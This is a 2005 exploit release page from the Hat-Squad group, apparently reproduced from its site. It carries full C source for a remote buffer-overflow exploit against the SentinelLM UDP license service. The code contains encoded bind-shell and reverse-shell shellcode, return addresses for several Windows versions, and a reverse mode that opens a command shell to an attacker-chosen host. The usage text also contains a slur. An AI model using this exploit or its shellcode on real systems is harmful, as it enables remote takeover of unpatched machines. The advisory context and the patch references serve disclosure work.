March 14, 2005
Hat-Squad Releases: SentinelLM License Service POC Exploit

/*
SentinelLM, UDP License Service Stack Overflow

Homepage: safenet-inc.com
Affected version: 7.*
Patched version: 8.0
Link: safenet-inc.com/products/sentinel/lm.asp
Date: 09 March 2005
Advisory: securitytracker.com/alerts/2005/Mar/1013385.html

Application Risk: High
Internet Risk: Medium (UDP)

Dicovery Credits: Dennis Rand (CIRT.DK)
Exploit Credits : class101

Hole History:

07-3-2005: BOF flaw published by Dennis Rand of CIRT.DK
09-3-2005: hat-squad's exploit done
13-3-2005: hat-squad's exploit released

Notes:

-the exploit targets 5093/UDP
-no bad chars detected
-Unlike it is said in the CIRT.DK advisory, you shouldn't submit 3000bytes of data, but indeed, the overflow is occuring at around
3900 bytes. SentinelLM will proceed the first 1035bytes of your buffer and will repeat those until the override of the stack.
Conclusion , you have to be good with maths (nor to control our friend olly & calc :>) to overwrite the right place in your buffer[1035]
to finally reach eip when your buffer "autogrows" at around buffer[3940].
-sending the buffer twice because the 1st attempt can fail sometimes.
-using a nice popopret outside of a loaded module for SP2and2k3 targets.
this offset has been tested on SP2 and 2003 ENGLISH (maybe langage-dependent dunno..)
-to note so that target3 (SP2/2k3) can work sometimes as target2 (SP1a/1/0) but it is not stable this is why I use
one of the two I have posted at fulldisclosure (0x71ABE325/SP1a/1/0). This last is stable for the 3 sp (ENGLISH!).

Compilation:

101_SentLM.cpp ......... Win32 (MSVC,cygwin)
101_SentLM.c ........... Linux (FreeBSD,etc..)


*Another fine working code, published as a patch warning or for an EXPERIMENTAL use!*


Greet:

*GUILLERMITO* "the terrorist...sigh..:("


PEJMAN
HAMID
HAT-SQUAD.COM
metasploit.com
A^C^E of addict3d.org
str0ke of milw0rm.com
and my homy CLASS101.ORG :>

*/

#include #include #include #ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";


char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
NOT xored, modded by class101 for ca's xpl0it to remove the common badchar "\x20"
original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";

char payload[1100];
char sip[3];char spo[1];

char pad[]="\xEB\x08\x90\x90";
char pad2[]="\xE9\xC2\xFC\xFF\xFF";
char ebx2k[]="\x08\xB0\x01\x78";
char ebxp[]="\x25\xE3\xAB\x71"; /*popopret inside of a loaded module for SP0-1-1a*/
char ebxsp2k3[]="\xE1\x1B\xFA\x7F"; /*popopret outside of a loaded module for SP2 and 2003*/
/*some tests*/
char fix[]="\x76\x6C\x6D\x73";
char fix2[]="\x72\x76\x72\x2E";

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
ver();
int co, sw=0, check1, check2;
unsigned long gip;
unsigned short gport;
char *target, *os;
if (argc>6||argc<3||atoi(argv[1])>4||atoi(argv[1])<1){usage(argv[0]);return -1;}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x00000000;
gport=htons(atoi(argv[5]))^(short)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x00000000;
gport=htons(atoi(argv[5]))^(USHORT)0x0000;
memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
check1=strlen(&sip[0]);check2=strlen(&spo[0]);
if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
printf("[+] error, the IP has a null byte in hex...\n");return -1;}
if (check2 != 2){printf("[+] error, the PORT has a null byte in hex...\n");return -1;}
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=5093;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_DGRAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){target=ebx2k;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro English";}
if (atoi(argv[1]) == 2){target=ebxp;os="WinXP SP0 Pro English\n[+] WinXP SP1 Pro English\n[+] WinXP SP1a Pro English";}
if (atoi(argv[1]) == 3){target=ebxsp2k3;os="WinXP SP2 Pro English";}
if (atoi(argv[1]) == 4){target=ebxsp2k3;os="Win2003 SP0 Server English";}
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
memset(payload,0x90,1100);
if (atoi(argv[1]) == 4)
{
memcpy(payload+836,target,4);
memcpy(payload+832,pad,4);
memcpy(payload+845,pad2,5);
}
else
{
memcpy(payload+840,target,4);
memcpy(payload+836,pad,4);
memcpy(payload+849,pad2,5);
}
memcpy(payload+12,fix,4);
memcpy(payload+16,fix2,4);
if (argc==6)
{
memcpy(&scode2[167], &gip, 4);
memcpy(&scode2[173], &gport, 2);
memcpy(payload+33,scode2,strlen(scode2));
}
else memcpy(payload+33,scode1,strlen(scode1));
printf("[+] target(s): %s\n",os);
printf("[+] sending datas to the udp port...\n");
co = sendto(s,payload,sizeof(payload),0,(struct sockaddr *)&server,sizeof(server));
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
co = sendto(s,payload,sizeof(payload),0,(struct sockaddr *)&server,sizeof(server));
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
timeout.tv_sec=10;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
sw = select((s+1),&mask,NULL,NULL,&timeout);
if(sw)
{
printf("[+] sending error, the server prolly rebooted.\n");
closesocket(s);
return -1;
}
else
{
printf("[+] size of payload: %d\n",strlen(payload));
if (argc==6){printf("[+] payload sent, look at your listener, you should get a shell\n");}
else printf("[+] payload sent, use telnet victimIP:101 to get a shell\n");
closesocket(s);
return 0;
}
return 0;
}


void usage(char* us)
{
printf(" \n");
printf(" [+] . 101_SentLM.exe Target VulnIP (bind mode) \n");
printf(" [+] . 101_SentLM.exe Target VulnIP VulnPORT (bind mode) \n");
printf(" [+] . 101_SentLM.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode) \n");
printf("TARGETS: \n");
printf(" [+] 1. Win2k SP4 Server English (*) - v5.0.2195 \n");
printf(" [+] 1. Win2k SP4 Pro English (*) - v5.0.2195 \n");
printf(" [+] 2. WinXP SP0 Pro. English (*) - v5.1.2600 \n");
printf(" [+] 2. WinXP SP1 Pro. English (*) - v5.1.2600 \n");
printf(" [+] 2. WinXP SP1a Pro. English (*) - v5.1.2600 \n");
printf(" [+] 3. WinXP SP2 Pro. English (*) - v5.1.2600.2180 \n");
printf(" [+] 4. Win2k3 SP0 Server English (*) - v5.2.3790 \n");
printf("NOTE: \n");
printf(" The exploit bind a cmdshell port 101 or \n");
printf(" reverse a cmdshell on your listener. \n");
printf(" A wildcard (*) mean tested working, else, supposed working. \n");
printf(" A symbol (-) mean all. \n");
printf(" Compilation msvc6, cygwin, Linux. \n");
printf(" \n");
return;
}
void ver()
{
printf(" \n");
printf("==================================[v0.1]====\n");
printf("==========SafeNet Sentinel LM=====================\n");
printf("=======Remote Buffer Overflow Exploit================\n");
printf("===coded by class101======[Hat-Squad.com]==========\n");
printf("====================[class101.org]==========\n");
printf(" \n");
}

Disclaimer:

Upon The presentation of the Security Patch by the owner, this exploit code has been published for scientific use only. The Publisher and Hat-Squad Security Team hold no Responsibility Concerning the misuse Of This exploit.


 


Join Hat-Squad Mailing List

E-mail Address:

Subscribe:Unsubscribe:


 
Copyright 2003-2004, Hat-Squad security Group, All rights reserved.